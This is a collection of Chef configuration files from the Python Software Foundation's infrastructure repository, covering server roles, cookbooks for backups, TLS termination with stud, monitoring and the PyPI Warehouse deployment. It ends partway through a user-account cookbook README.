"content_id": "781e827a9f5bf42883344cf5a2b9c59a8eac66f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 7,
"path": "/roles/redesign-staging.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"redesign-staging\"\ndescription \"Staging server for web redesign project\"\n# Owners: Jacob Kaplan-Moss <[email protected]>, Frank Wiles <[email protected]>\nrun_list [\n \"recipe[pydotorg-redesign::staging]\",\n \"recipe[pydotorg-redesign::elasticsearch]\"\n]\n"
},
{
"alpha_fraction": 0.63692307472229,
"alphanum_fraction": 0.6492307782173157,
"avg_line_length": 26.08333396911621,
"blob_id": "2675b4c9052677954745f95fd73c6286bd9d84e2",
"content_id": "d98a5785388023dc5d6f3e41a1aa88da8f5bd838",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 12,
"path": "/cookbooks/psf-evote/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name 'psf-evote'\nmaintainer 'Noah Kantrowitz'\nmaintainer_email '[email protected]'\nlicense 'Apache 2'\ndescription 'Installs/Configures Evote'\nlong_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))\nversion '0.1.1'\n\ndepends 'git'\ndepends 'python'\ndepends 'gunicorn'\ndepends 'supervisor'\n"
},
{
"alpha_fraction": 0.6107010841369629,
"alphanum_fraction": 0.6328413486480713,
"avg_line_length": 18.35714340209961,
"blob_id": "c303a9fcb20f5a3f6bbb9f7c58d397ac3a04b8f7",
"content_id": "7a0109953e9dcdb1c2f709137299cf35e36261b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 542,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 28,
"path": "/doc/index.rst",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": ".. psf-infra documentation master file, created by\n sphinx-quickstart on Mon Mar 4 00:48:32 2013.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome!\n=====================================\n\nWelcome to the Python Infrastructure Team Documentation Index\n\n\n\n.. toctree::\n :maxdepth: 2\n\n services/index\n\n\n\nLet's get started\n==================\n\n* :ref:`genindex`\n* :ref:`search`\n* :doc:`getting-started`\n* :doc:`nodes`\n* :doc:`roles`\n* :doc:`generating-these-docs`\n"
},
{
"alpha_fraction": 0.7126436829566956,
"alphanum_fraction": 0.7126436829566956,
"avg_line_length": 16.399999618530273,
"blob_id": "904a3322500b5370b68a00ea18c7b26fb77b735b",
"content_id": "9d6567803356edb045bdf977c3e5e1ba39c015cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 87,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 5,
"path": "/roles/advocacy.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"advocacy\"\ndescription \"PSF advocacy site\"\nrun_list [\n \"recipe[psf-advocacy]\",\n]\n"
},
{
"alpha_fraction": 0.7441860437393188,
"alphanum_fraction": 0.7441860437393188,
"avg_line_length": 13.333333015441895,
"blob_id": "a2600092d8cb2d904895fb2f22a311f2f77c98e9",
"content_id": "b6c827500ca2e9f8a12b35492d520bf5f4c3c937",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 43,
"license_type": "no_license",
"max_line_length": 20,
"num_lines": 3,
"path": "/cookbooks/psf-misc/recipes/sysstat.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "package 'sysstat' do\n action :upgrade\nend\n"
},
{
"alpha_fraction": 0.6495412588119507,
"alphanum_fraction": 0.6629969477653503,
"avg_line_length": 45.71428680419922,
"blob_id": "980308a0a03b45097ae4aa4ce8de21ae6ba0f038",
"content_id": "1757ec68e247873e30795ab56333fc36d23ad49f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1635,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 35,
"path": "/cookbooks/stud/resources/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "default_action :install\n\nattribute :name, :name_attribute => true\nattribute :version, :kind_of => String, :required => true\nattribute :config_template, :kind_of => String\nattribute :service_template, :kind_of => String\nattribute :frontend, :kind_of => String, :default => '[*]:8443'\nattribute :backend, :kind_of => String, :default => '[127.0.0.1]:8000'\nattribute :pem_file, :kind_of => [String, Array], :required => true\nattribute :tls, :equal_to => [true, false], :default => true\nattribute :ssl, :equal_to => [true, false], :default => false\nattribute :ciphers, :kind_of => String, :default => ''\nattribute :prefer_server_ciphers, :equal_to => [true, false], :default => false\nattribute :ssl_engine, :kind_of => String, :default => ''\nattribute :workers, :kind_of => Integer, :default => 1\nattribute :backlog, :kind_of => Integer, :default => 100\nattribute :keepalive, :kind_of => Integer, :default => 3600\nattribute :chroot, :kind_of => String, :default => ''\nattribute :user, :kind_of => String, :default => ''\nattribute :group, :kind_of => String, :default => ''\nattribute :quiet, :equal_to => [true, false], :default => false\nattribute :syslog, :equal_to => [true, false], :default => false\nattribute :syslog_facility, :kind_of => String, :default => 'daemon'\nattribute :daemon, :equal_to => [true, false], :default => false\nattribute :write_ip, :equal_to => [true, false], :default => false\nattribute :write_proxy, :equal_to => [true, false], :default => false\nattribute :proxy_proxy, :equal_to => [true, false], :default => false\n\ndef resource_name\n if self.name != 'stud'\n \"stud-#{self.name}\"\n else\n 'stud'\n end\nend\n"
},
{
"alpha_fraction": 0.52173912525177,
"alphanum_fraction": 0.5489130616188049,
"avg_line_length": 29.66666603088379,
"blob_id": "711bf7ad4e76605a47727a2688b2b875accab1e1",
"content_id": "5d311a92aefdf0138a3463ef4fbe7661533b9930",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 6,
"path": "/cookbooks/stud/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"stud\"\nmaintainer \"Benjamin W. Smith\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Install and configure stud\"\nversion \"0.0.5\"\n"
},
{
"alpha_fraction": 0.5470319390296936,
"alphanum_fraction": 0.5488584637641907,
"avg_line_length": 20.47058868408203,
"blob_id": "8b4679b3b0835060a1f0f0fbd669527c0e0a5611",
"content_id": "d4cc97878e1d09a2dc67d27c39a24edbb2e76bd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1095,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 51,
"path": "/roles/base.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"base\"\ndescription \"Base recipes for all nodes\"\nrun_list [\n \"recipe[chef-client::cron]\",\n \"recipe[chef-client::delete_validation]\",\n \"recipe[user::data_bag]\",\n \"recipe[psf-misc::sudo]\",\n \"recipe[psf-misc::backup]\",\n \"recipe[psf-misc::ntp]\",\n \"recipe[psf-misc::ack]\",\n \"recipe[psf-misc::sysstat]\",\n \"recipe[psf-misc::ops-scripts]\",\n \"recipe[ntp]\",\n \"recipe[motd-tail]\",\n \"recipe[zsh]\",\n \"recipe[openssh]\",\n \"recipe[rsnapshot::client]\",\n \"recipe[rsnapshot::backupall]\",\n \"recipe[psf-monitoring::client]\",\n]\noverride_attributes({\n :authorization => {\n :sudo => {\n :include_sudoers_d => true,\n },\n },\n :chef_client => {\n :cron => {\n :minute => \"*/30\",\n :hour => \"*\",\n }\n },\n :ntp => {\n :servers => [\"time.osuosl.org\"],\n },\n :openssh => {\n :server => {\n :password_authentication => \"no\",\n :permit_root_login => \"without-password\",\n :subsystem => \"sftp /usr/lib/openssh/sftp-server\",\n },\n },\n :rsnapshot => {\n :client => {\n :server_role => \"rsnapshot\",\n },\n },\n :user => {\n :ssh_keygen => false,\n },\n})\n"
},
{
"alpha_fraction": 0.6197352409362793,
"alphanum_fraction": 0.6257520914077759,
"avg_line_length": 24.569231033325195,
"blob_id": "43bdf482e385d35cf489b4466983b2edd68e0785",
"content_id": "a89c85143559ba997c309c8789c4e7a4ebe1ee13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1662,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 65,
"path": "/cookbooks/rsnapshot/providers/server.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "action :install do\n package 'rsnapshot' do\n action :upgrade\n end\n\n backups = []\n search(:node, 'rsnapshot_backups:*') do |backup_node|\n backup_node['rsnapshot_backups'].each do |directory, backup|\n next if backup_node.name == node.name # For now just skip self\n backup = backup.to_hash\n backup['host'] = backup_node['fqdn'] || backup_node['ipaddress']\n backup['directory'] << '/' unless backup['directory'].end_with?('/')\n backups << backup if backup['host']\n end\n end\n\n scripts = []\n run_context.resource_collection.each do |res|\n if res.is_a? Chef::Resource::RsnapshotScript\n scripts << res\n end\n end\n\n template \"#{new_resource.dir}/rsnapshot.conf\" do\n source 'rsnapshot.conf.erb'\n owner 'root'\n group 'root'\n mode '400'\n variables :server => new_resource, :backups => backups, :scripts => scripts\n end\n\n new_resource.retain.each do |ret|\n cron \"rsnapshot-#{new_resource.name}-#{ret.name}\" do\n minute ret.minute\n hour ret.hour\n day ret.day\n month ret.month\n weekday ret.weekday\n command \"/usr/bin/rsnapshot #{ret.name}\"\n end\n end\n\n # Just in case\n directory '/root/.ssh' do\n owner 'root'\n group 'root'\n mode '755'\n end\n\n execute \"#{new_resource.name}: generate SSH key\" do\n command 'ssh-keygen -t rsa -b 4096 -f /root/.ssh/id_rsnapshot -N \"\"'\n user 'root'\n not_if { ::File.exists?('/root/.ssh/id_rsnapshot')}\n end\n\n ruby_block \"#{new_resource.name}: read SSH key\" do\n block do\n node.set['rsnapshot']['server_key'] = ::File.new('/root/.ssh/id_rsnapshot.pub').read\n end\n end\nend\n\naction :remove do\n raise 'later'\nend\n"
},
{
"alpha_fraction": 0.6693227291107178,
"alphanum_fraction": 0.6693227291107178,
"avg_line_length": 21.81818199157715,
"blob_id": "54ceaf0ae5d42c05100823782b9af97df79101b2",
"content_id": "5d627406f44553efc167f48f85c7d7e5885be98d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 11,
"path": "/cookbooks/rsnapshot/providers/backup.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "action :backup do\n node.set['rsnapshot_backups'] ||= {}\n node.set['rsnapshot_backups'][new_resource.directory] = {\n 'directory' => new_resource.directory,\n 'options' => new_resource.full_options,\n }\nend\n\naction :remove do\n raise 'later'\nend\n"
},
{
"alpha_fraction": 0.8518518805503845,
"alphanum_fraction": 0.8518518805503845,
"avg_line_length": 26,
"blob_id": "751865d579b11cc4d7345670e187c4dec4703c91",
"content_id": "cbf1a0a768dc774c1e784aea3096f100b648d79c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 1,
"path": "/cookbooks/pypy-home/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "Configuration for pypy.org\n"
},
{
"alpha_fraction": 0.5767503380775452,
"alphanum_fraction": 0.5931307673454285,
"avg_line_length": 21.005813598632812,
"blob_id": "650d433b1d2ee9496c80f5df014616e58acac73c",
"content_id": "b2daabcd76568e17056846e948b6ccb322c26a1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 3785,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 172,
"path": "/cookbooks/psf-pypi/recipes/warehouse.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# Get our Database settings\ndatabase = data_bag_item(\"secrets\", \"postgres\")\n\n# Get our secrets\nsecrets = data_bag_item(\"secrets\", \"pypi\")\n\nelasticsearch = data_bag_item(\"secrets\", \"elasticsearch\")\n\n# Make sure Nginx is installed\ninclude_recipe \"nginx\"\n\n# Make sure supervisor is available to us\ninclude_recipe \"supervisor\"\n\nenviron = {\n \"LANG\" => \"en_US.UTF8\",\n \"WAREHOUSE_CONF\" => \"/opt/warehouse/etc/config.yml\",\n \"SENTRY_DSN\" => secrets[\"sentry\"][\"dsn\"],\n}\n\napt_repository \"pypy\" do\n uri \"http://ppa.launchpad.net/pypy/ppa/ubuntu\"\n distribution node['lsb']['codename']\n components [\"main\"]\n keyserver \"keyserver.ubuntu.com\"\n key \"2862D0785AFACD8C65B23DB0251104D968854915\"\nend\n\napt_repository \"warehouse\" do\n uri \"http://162.242.214.29/\"\n distribution node['lsb']['codename']\n components [\"main\"]\n key \"psf.gpg\"\nend\n\nexecute \"update repositories\" do\n command \"apt-get update -q -y\"\nend\n\npackage \"warehouse\" do\n action :upgrade\n\n notifies :restart, \"service[warehouse]\"\nend\n\ngunicorn_config \"/opt/warehouse/etc/gunicorn.config.py\" do\n owner \"root\"\n group \"warehouse\"\n\n listen \"unix:/opt/warehouse/var/run/warehouse.sock\"\n\n action :create\n notifies :restart, \"service[warehouse]\"\nend\n\neshosts = []\nif node[\"warehouse\"][\"elasticsearch\"][\"hosts\"].empty?\n search(:node, \"role:elasticsearch AND chef_environment:#{node.chef_environment}\") do |n|\n eshosts << {\"host\" => n['fqdn'], \"port\" => 8200}\n end\nelse\n eshosts = node[\"warehouse\"][\"elasticsearch\"][\"hosts\"]\nend\n\nfile \"/opt/warehouse/etc/config.yml\" do\n owner \"root\"\n group \"warehouse\"\n mode \"0640\"\n backup false\n\n content ({\n \"debug\" => false,\n \"site\" => {\n \"name\" => \"Python Package Index (Preview)\",\n },\n \"database\" => {\n \"url\" => database[\"pypi\"][\"url\"],\n },\n \"redis\" => {\n \"url\" => \"redis://localhost:6379/0\",\n },\n \"search\" => {\n \"hosts\" => eshosts,\n \"client_options\" => {\n \"http_auth\" => \"#{elasticsearch['username']}:#{elasticsearch['password']}\",\n \"use_ssl\" => true,\n },\n },\n \"assets\" => {\n \"directory\" => \"/opt/warehouse/var/www/static\"\n },\n \"urls\" => {\n \"documentation\" => \"http://pythonhosted.org/\",\n },\n \"paths\" => {\n \"packages\" => \"/data/packages\",\n \"documentation\" => \"/data/packagedocs\",\n },\n \"cache\" => {\n \"browser\" => {\n \"index\" => 900,\n \"simple\" => 900,\n \"packages\" => 900,\n \"project_detail\" => 900,\n \"user_profile\" => 900,\n },\n \"varnish\" => {\n \"index\" => 60,\n \"simple\" => 86400,\n \"packages\" => 86400,\n \"project_detail\" => 60,\n \"user_profile\" => 60,\n },\n },\n \"security\" => {\n \"csp\" => {\n \"default-src\" => [\"https://\" + node[\"warehouse\"][\"domains\"].first],\n },\n },\n \"sentry\" => {\n \"dsn\" => secrets[\"sentry\"][\"dsn\"],\n }\n }.to_yaml)\n\n notifies :restart, \"service[warehouse]\"\nend\n\npython_pip \"gunicorn\" do\n virtualenv \"/opt/warehouse\"\n action :upgrade\n notifies :restart, \"service[warehouse]\"\nend\n\ntemplate \"/etc/init/warehouse.conf\" do\n source \"warehouse.upstart.conf.erb\"\n owner \"root\"\n group \"root\"\n mode \"0644\"\n\n variables ({\n :environment => environ,\n })\n\n notifies :restart, \"service[warehouse]\"\nend\n\nservice \"warehouse\" do\n provider Chef::Provider::Service::Upstart\n action [:enable, :start]\nend\n\ntemplate \"#{node['nginx']['dir']}/sites-available/warehouse.conf\" do\n owner \"root\"\n group \"root\"\n mode \"0640\"\n backup false\n\n source \"nginx-warehouse.conf.erb\"\n\n variables ({\n :domains => node[\"warehouse\"][\"domains\"],\n :sock => \"/opt/warehouse/var/run/warehouse.sock\",\n :name => \"warehouse\",\n :static_root => \"/opt/warehouse/var/www\",\n })\n\n notifies :reload, \"service[nginx]\"\nend\n\nnginx_site \"warehouse.conf\" do\n enable true\nend\n"
},
{
"alpha_fraction": 0.6604938507080078,
"alphanum_fraction": 0.6790123581886292,
"avg_line_length": 28.454545974731445,
"blob_id": "4c06652b83ad142522b7c956339467a0cb1bba77",
"content_id": "aa3f3b3666fdcebb3f536f9ab0dfc16948ace7d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 11,
"path": "/cookbooks/psf-loadbalancer/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "maintainer \"Noah Kantrowitz\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Configuration related to the PSF load balancers\"\nlong_description IO.read(File.join(File.dirname(__FILE__), 'README.md'))\nversion \"0.0.35\"\n\ndepends \"heartbeat\"\n#depends \"jn_sysctl\"\ndepends \"haproxy\"\ndepends \"stud\"\n"
},
{
"alpha_fraction": 0.6314102411270142,
"alphanum_fraction": 0.6474359035491943,
"avg_line_length": 23,
"blob_id": "439292ef71816df5417215b65b42496b523af0e5",
"content_id": "c222177f1b4d596c953db19effb12332e189902a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 312,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 13,
"path": "/cookbooks/psf-monitoring/metadata.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"psf-monitoring\"\nmaintainer \"Benjamin W. Smith\"\nmaintainer_email \"[email protected]\"\nlicense \"Apache 2.0\"\ndescription \"Install and configure Monitoring Tools\"\nversion \"0.0.2\"\n\ndepends \"riemann\"\ndepends \"runit\"\ndepends \"graphite\"\ndepends \"apt\"\ndepends \"collectd\"\ndepends \"firewall\"\n"
},
{
"alpha_fraction": 0.6296914219856262,
"alphanum_fraction": 0.6388657093048096,
"avg_line_length": 22.509803771972656,
"blob_id": "48b61cd600cf8a3af35ba5159edc87f442f28ccd",
"content_id": "abfbb81464598a2c34ea4e4dd7dbe3f679dbdf9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1199,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 51,
"path": "/cookbooks/rsnapshot/providers/client.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "action :install do\n group 'rsnapshot' do\n system true\n end\n\n user 'rsnapshot' do\n comment 'rsnapshot backup service'\n gid 'rsnapshot'\n system true\n shell '/bin/bash'\n home '/home/rsnapshot'\n supports :manage_home => true\n end\n\n cookbook_file '/usr/local/bin/rsnapshot-rsync.py' do\n source 'rsync.py'\n owner 'root'\n group 'root'\n mode '755'\n end\n\n directory '/home/rsnapshot/.ssh' do\n owner 'rsnapshot'\n group 'rsnapshot'\n mode '755'\n end\n\n if new_resource.server_role\n server = search(:node, \"roles:#{new_resource.server_role}\").first\n if server\n file '/home/rsnapshot/.ssh/authorized_keys' do\n owner 'rsnapshot'\n group 'rsnapshot'\n mode '644'\n content %Q{no-pty,no-agent-forwarding,no-X11-forwarding,no-port-forwarding,from=\"#{server['ipaddress']}\",command=\"sudo /usr/local/bin/rsnapshot-rsync.py\" #{server['rsnapshot']['server_key']}}\n end\n else\n file '/home/rsnapshot/.ssh/authorized_keys' do\n action :delete\n end\n end\n else\n file '/home/rsnapshot/.ssh/authorized_keys' do\n action :delete\n end\n end\n\n sudo new_resource.name do\n template 'sudoers.erb'\n end\nend\n"
},
{
"alpha_fraction": 0.6751188635826111,
"alphanum_fraction": 0.6835710406303406,
"avg_line_length": 30.032787322998047,
"blob_id": "f1ab3bd695897a748aaf53d7a0d57702d4564dae",
"content_id": "24b91c5e25349b295bbc05e45c7e275ab37ff291",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 1893,
"license_type": "no_license",
"max_line_length": 196,
"num_lines": 61,
"path": "/cookbooks/stud/providers/default.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "action :install do\n # Quickie argument validation\n write_count = [new_resource.write_ip, new_resource.write_proxy, new_resource.proxy_proxy].count{|val| val}\n raise 'At most one of write-ip, write-proxy, and proxy-proxy can be enabled' if write_count > 1\n raise \"Certificate #{new_resource.pem_file} not found\" unless new_resource.pem_file.is_a?(Array) ? new_resource.pem_file.all?{|path| ::File.exists?(path)} : ::File.exists?(new_resource.pem_file)\n\n package_file_name = \"stud_#{new_resource.version}_amd64.deb\"\n\n package 'libev4' do\n action :upgrade\n end\n\n cookbook_file \"#{Chef::Config[:file_cache_path]}/#{package_file_name}\" do\n source package_file_name\n cookbook 'stud'\n owner 'root'\n group 'root'\n mode '644'\n end\n\n dpkg_package 'stud' do\n source \"#{Chef::Config[:file_cache_path]}/#{package_file_name}\"\n version new_resource.version\n end\n\n template \"/etc/init/#{new_resource.resource_name}.conf\" do\n source new_resource.service_template || 'upstart.conf.erb'\n cookbook new_resource.service_template ? new_resource.cookbook_name.to_s : 'stud'\n owner 'root'\n group 'root'\n mode '644'\n variables :stud => new_resource\n notifies :restart, \"service[#{new_resource.resource_name}]\"\n end\n\n service new_resource.resource_name do\n action :enable\n provider Chef::Provider::Service::Upstart\n supports :status => true\n end\n\n directory '/etc/stud' do\n owner 'root'\n group 'root'\n mode '755'\n end\n\n template \"/etc/stud/#{new_resource.name}.conf\" do\n source new_resource.config_template || 'stud.conf.erb'\n cookbook new_resource.config_template ? new_resource.cookbook_name.to_s : 'stud'\n owner 'root'\n group 'root'\n mode '644'\n variables :stud => new_resource\n notifies :restart, \"service[#{new_resource.resource_name}]\"\n end\n\n service new_resource.resource_name do\n action :start\n end\nend\n"
},
{
"alpha_fraction": 0.7558139562606812,
"alphanum_fraction": 0.7558139562606812,
"avg_line_length": 27.66666603088379,
"blob_id": "c12993407b70cf3a8b4293ce4f67713e18b5ecb1",
"content_id": "67746be076d42a14e2354cdb4d5b8765b777e2c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Ruby",
"length_bytes": 86,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 3,
"path": "/roles/rpi.rb",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "name \"rpi\"\ndescription \"RaspberryPI News/Info site\"\n# Jesse Noller is owner of this service\n"
},
{
"alpha_fraction": 0.6475747227668762,
"alphanum_fraction": 0.6520494222640991,
"avg_line_length": 28.328083038330078,
"blob_id": "53a4f7a37b7000c2dee5812982721a8cd3974ec5",
"content_id": "33c646b2374cd11934f40cb06364ded2f4ba7641",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11174,
"license_type": "permissive",
"max_line_length": 156,
"num_lines": 381,
"path": "/cookbooks/user/README.md",
"repo_name": "python/psf-chef",
"src_encoding": "UTF-8",
"text": "# <a name=\"title\"></a> chef-user [](http://travis-ci.org/fnichol/chef-user)\n\n## <a name=\"description\"></a> Description\n\nA convenient Chef LWRP to manage user accounts and SSH keys. This is **not**\nthe Opscode *users* cookbook.\n\n* Github: https://github.com/fnichol/chef-user\n* Opscode Community Site: http://community.opscode.com/cookbooks/user\n\n## <a name=\"usage\"></a> Usage\n\nSimply include `recipe[user]` in your run\\_list and the `user_account`\nresource will be available.\n\nTo use `recipe[user::data_bag]`, include it in your run\\_list and have a\ndata bag called `\"users\"` with an item like the following:\n\n {\n \"id\" : \"hsolo\",\n \"comment\" : \"Han Solo\",\n \"home\" : \"/opt/hoth/hsolo\",\n \"ssh_keys\" : [\"123...\", \"456...\"]\n }\n\nor a user to be removed:\n\n {\n \"id\" : \"lando\",\n \"action\" : \"remove\"\n }\n\nThe data bag recipe will iterate through a list of usernames defined in\n`node['users']` and attempt to pull in the user's information from the data\nbag item. In other words, having:\n\n node['users'] = ['hsolo']\n\nwill set up the `hsolo` user information and not use the `lando` user\ninformation.\n\n## <a name=\"requirements\"></a> Requirements\n\n### <a name=\"requirements-chef\"></a> Chef\n\nTested on 0.10.8 but newer and older version should work just fine. File an\n[issue][issues] if this isn't the case.\n\n### <a name=\"requirements-platform\"></a> Platform\n\nThe following platforms have been tested with this cookbook, meaning that the\nrecipes run on these platforms without error:\n\n* ubuntu\n* debian\n* mac_os_x\n\n### <a name=\"requirements-cookbooks\"></a> Cookbooks\n\nThere are **no** external cookbook dependencies.\n\n## <a name=\"installation\"></a> Installation\n\nDepending on the situation and use case there are several ways to install\nthis cookbook. All the methods listed below assume a tagged version release\nis the target, but omit the tags to get the head of development. A valid\nChef repository structure like the [Opscode repo][chef_repo] is also assumed.\n\n### <a name=\"installation-platform\"></a> From the Opscode Community Platform\n\nTo install this cookbook from the Opscode platform, use the *knife* command:\n\n knife cookbook site install user\n\n### <a name=\"installation-librarian\"></a> Using Librarian-Chef\n\n[Librarian-Chef][librarian] is a bundler for your Chef cookbooks.\nInclude a reference to the cookbook in a [Cheffile][cheffile] and run\n`librarian-chef install`. To install Librarian-Chef:\n\n gem install librarian\n cd chef-repo\n librarian-chef init\n\nTo use the Opscode platform version:\n\n echo \"cookbook 'user'\" >> Cheffile\n librarian-chef install\n\nOr to reference the Git version:\n\n cat >> Cheffile <<END_OF_CHEFFILE\n cookbook 'user',\n :git => 'git://github.com/fnichol/chef-user.git', :ref => 'v0.2.10'\n END_OF_CHEFFILE\n librarian-chef install\n\n### <a name=\"installation-kgc\"></a> Using knife-github-cookbooks\n\nThe [knife-github-cookbooks][kgc] gem is a plugin for *knife* that supports\ninstalling cookbooks directly from a GitHub repository. To install with the\nplugin:\n\n gem install knife-github-cookbooks\n cd chef-repo\n knife cookbook github install fnichol/chef-user/v0.2.10\n\n### <a name=\"installation-gitsubmodule\"></a> As a Git Submodule\n\nA common practice (which is getting dated) is to add cookbooks as Git\nsubmodules. This is accomplishes like so:\n\n cd chef-repo\n git submodule add git://github.com/fnichol/chef-user.git cookbooks/user\n git submodule init && git submodule update\n\n**Note:** the head of development will be linked here, not a tagged release.\n\n### <a name=\"installation-tarball\"></a> As a Tarball\n\nIf the cookbook needs to downloaded temporarily just to be uploaded to a Chef\nServer or Opscode Hosted Chef, then a tarball installation might fit the bill:\n\n cd chef-repo/cookbooks\n curl -Ls https://github.com/fnichol/chef-user/tarball/v0.2.10 | tar xfz - && \\\n mv fnichol-chef-user-* user\n\n## <a name=\"recipes\"></a> Recipes\n\n### <a name=\"recipes-default\"></a> default\n\nThis recipe is a no-op and does nothing.\n\n### <a name=\"recipes-data-bag\"></a> default\n\nProcesses a list of users with data drawn from a data bag. The default data bag\nis `users` and the list of user account to create on this node is set on\n`node['users']`.\n\n## <a name=\"attributes\"></a> Attributes\n\n### <a name=\"attributes-home-root\"></a> home_root\n\nThe default parent path of a user's home directory. Each resource can override\nthis value which varies by platform. Generally speaking, the default value is\n`\"/home\"`.\n\n### <a name=\"attributes-default-shell\"></a> default_shell\n\nThe default user shell given to a user. Each resource can override this value\nwhich varies by platform. Generally speaking, the default value is\n`\"/bin/bash\"`.\n\n### <a name=\"attributes-manage-home\"></a> manage_home\n\nWhether of not to manage the home directory of a user by default. Each resource\ncan override this value. The are 2 valid states:\n\n* `\"true\"`, `true`, or `\"yes\"`: will manage the user's home directory.\n* `\"false\"`, `false`, or `\"no\"`: will not manage the user's home directory.\n\nThe default is `true`.\n\n### <a name=\"attributes-create-user-group\"></a> create_user_group\n\nWhether or not to to create a group with the same name as the user by default.\nEach resource can override this value. The are 2 valid states:\n\n* `\"true\"`, `true`, or `\"yes\"`: will create a group for the user by default.\n* `\"false\"`, `false`, or `\"no\"`: will not create a group for the user by default.\n\nThe default is `true`.\n\n### <a name=\"attributes-ssh-keygen\"></a> ssh_keygen\n\nWhether or not to generate an SSH keypair for the user by default. Each\nresource can override this value. There are 2 valid states:\n\n* `\"true\"`, `true`, or `\"yes\"`: will generate an SSH keypair when the account\n is created.\n* `\"false\"`, `false`, or `\"no\"`: will not generate an SSH keypair when the account\n is created.\n\nThe default is `true`.\n\n### <a name=\"attributes-data-bag\"></a> data_bag\n\nThe data bag name containing a group of user account information. This is used\nby the `data_bag` recipe to use as a database of user accounts. The default is\n`\"users\"`.\n\n## <a name=\"lwrps\"></a> Resources and Providers\n\n### <a name=\"lwrps-ua\"></a> user_account\n\n**Note:** in order to use the `password` attribute, you must have the\n[ruby-shadow gem][ruby-shadow_gem] installed. On Debian/Ubuntu you can get\nthis by installing the \"libshadow-ruby1.8\" package.\n\n### <a name=\"lwrps-ua-actions\"></a> Actions\n\n<table>\n <thead>\n <tr>\n <th>Action</th>\n <th>Description</th>\n <th>Default</th>\n </tr>\n </thead>\n <tbody>\n <tr>\n <td>create</td>\n <td>\n Create the user, its home directory, <code>.ssh/authorized_keys</code>,\n and <code>.ssh/{id_dsa,id_dsa.pub}</code>.\n </td>\n <td>Yes</td>\n </tr>\n <tr>\n <td>remove</td>\n <td>Remove the user account.</td>\n <td> </td>\n </tr>\n <tr>\n <td>modify</td>\n <td>Modiy the user account.</td>\n <td> </td>\n </tr>\n <tr>\n <td>manage</td>\n <td>Manage the user account.</td>\n <td> </td>\n </tr>\n <tr>\n <td>lock</td>\n <td>Lock the user's password.</td>\n <td> </td>\n </tr>\n <tr>\n <td>unlock</td>\n <td>Unlock the user's password.</td>\n <td> </td>\n </tr>\n </tbody>\n</table>\n\n### <a name=\"lwrps-ua-attributes\"></a> Attributes\n\n<table>\n <thead>\n <tr>\n <th>Attribute</th>\n <th>Description</th>\n <th>Default Value</th>\n </tr>\n </thead>\n <tbody>\n 